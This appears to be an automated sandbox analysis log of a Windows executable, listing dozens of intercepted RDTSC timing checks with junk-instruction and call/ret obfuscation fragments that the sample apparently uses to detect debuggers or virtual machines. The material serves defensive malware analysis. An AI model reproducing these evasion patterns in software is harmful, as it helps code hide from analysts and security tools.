Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3FD8 second address: EA4005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0154ED0547h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4005 second address: EA400C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA41A5 second address: EA41C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F0154ED0538h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA432B second address: EA432F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4496 second address: EA449B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA449B second address: EA44A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F0154ECB876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA45E4 second address: EA45E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA45E8 second address: EA45FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0154ECB87Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA45FA second address: EA4603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4603 second address: EA460C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4760 second address: EA477D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jmp 00007F0154ED0543h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA477D second address: EA47A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB87Bh 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F0154ECB882h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4A20 second address: EA4A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0154ED0536h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4A2F second address: EA4A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4A35 second address: EA4A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A751 second address: E9A755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A755 second address: E9A759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A759 second address: E9A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A761 second address: E9A76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A76A second address: E9A774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A774 second address: E9A77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7C938 second address: E7C93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7C93C second address: E7C945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5592 second address: EA55A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0154ECB87Bh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA55A9 second address: EA55AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8AF2 second address: EA8AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA7847 second address: EA7862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC35F second address: EAC36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74539 second address: E7453D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7453D second address: E74541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2012 second address: EB2030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0154ED0549h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2030 second address: EB2035 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB261F second address: EB2628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2628 second address: EB2640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2640 second address: EB2648 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB27C2 second address: EB280B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB884h 0x00000009 popad 0x0000000a pop ecx 0x0000000b js 00007F0154ECB8ABh 0x00000011 pushad 0x00000012 jg 00007F0154ECB876h 0x00000018 jmp 00007F0154ECB887h 0x0000001d jbe 00007F0154ECB876h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB280B second address: EB280F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2956 second address: EB295A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB295A second address: EB2981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0154ED0547h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2981 second address: EB2998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0154ECB876h 0x0000000a popad 0x0000000b ja 00007F0154ECB87Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2998 second address: EB299F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB45BB second address: EB45C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB45C1 second address: EB45C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB45C5 second address: EB45C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4693 second address: EB4699 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4699 second address: EB469F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB469F second address: EB46A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB46A3 second address: EB46F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0A6C84A9h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0154ECB878h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 js 00007F0154ECB87Bh 0x0000002f sub si, A444h 0x00000034 add dword ptr [ebp+122D2E23h], ecx 0x0000003a push 30CCCAB3h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F0154ECB881h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB4B79 second address: EB4BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007F0154ED053Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB5271 second address: EB5277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB5277 second address: EB52B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0154ED0547h 0x0000000e xchg eax, ebx 0x0000000f jno 00007F0154ED053Ch 0x00000015 or dword ptr [ebp+1245C9B8h], edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB52B1 second address: EB52B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB52B5 second address: EB52BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB52BB second address: EB52C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0154ECB876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB57BB second address: EB57C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB57C0 second address: EB57C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB5DBF second address: EB5DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB676B second address: EB678A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0154ECB882h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB678A second address: EB67F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F0154ED0544h 0x0000000f mov edi, dword ptr [ebp+122D392Eh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F0154ED0538h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov esi, dword ptr [ebp+122D382Ah] 0x00000039 push eax 0x0000003a pushad 0x0000003b jbe 00007F0154ED053Ch 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7720 second address: EB7758 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0154ECB883h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F0154ECB888h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB6F85 second address: EB6F8F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8260 second address: EB8269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB89F0 second address: EB89F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB9684 second address: EB96E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0154ECB878h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D37B6h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F0154ECB878h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D3B02h] 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 jnl 00007F0154ECB876h 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB96E8 second address: EB96EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB96EC second address: EB9718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F0154ECB87Ch 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBA251 second address: EBA255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE539 second address: EBE554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE554 second address: EBE558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEBA4 second address: EBEBC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB888h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBFBDE second address: EBFBE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBFBE4 second address: EBFBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC79 second address: EBEC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBFBE8 second address: EBFC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jbe 00007F0154ECB878h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F0154ECB878h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F0154ECB878h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c pushad 0x0000004d mov dword ptr [ebp+122D2AE6h], edi 0x00000053 add dword ptr [ebp+122D1830h], ecx 0x00000059 popad 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC7D second address: EBEC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC81 second address: EBEC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC8B second address: EBEC8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBFDDC second address: EBFE5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0154ECB878h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D27A7h], edx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov bl, A3h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F0154ECB878h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov eax, dword ptr [ebp+122D0B21h] 0x0000005a add ebx, dword ptr [ebp+122D297Fh] 0x00000060 push FFFFFFFFh 0x00000062 sbb bx, B700h 0x00000067 push eax 0x00000068 pushad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEC8F second address: EBEC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC53BD second address: EC53C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC53C2 second address: EC53D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED053Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC63CA second address: EC641D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0154ECB878h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1245C92Ah], edx 0x0000002a or di, 0DEAh 0x0000002f push 00000000h 0x00000031 movzx edi, si 0x00000034 push 00000000h 0x00000036 jmp 00007F0154ECB87Ch 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f pushad 0x00000040 popad 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5549 second address: EC5558 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC641D second address: EC6422 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5558 second address: EC55C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D342Ch], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, edx 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0154ED0538h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov eax, dword ptr [ebp+122D1731h] 0x0000003d push esi 0x0000003e add dword ptr [ebp+1246BCC5h], eax 0x00000044 pop ebx 0x00000045 push FFFFFFFFh 0x00000047 mov ebx, dword ptr [ebp+1245C92Ah] 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jmp 00007F0154ED0540h 0x00000056 jp 00007F0154ED0536h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC55C5 second address: EC55CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
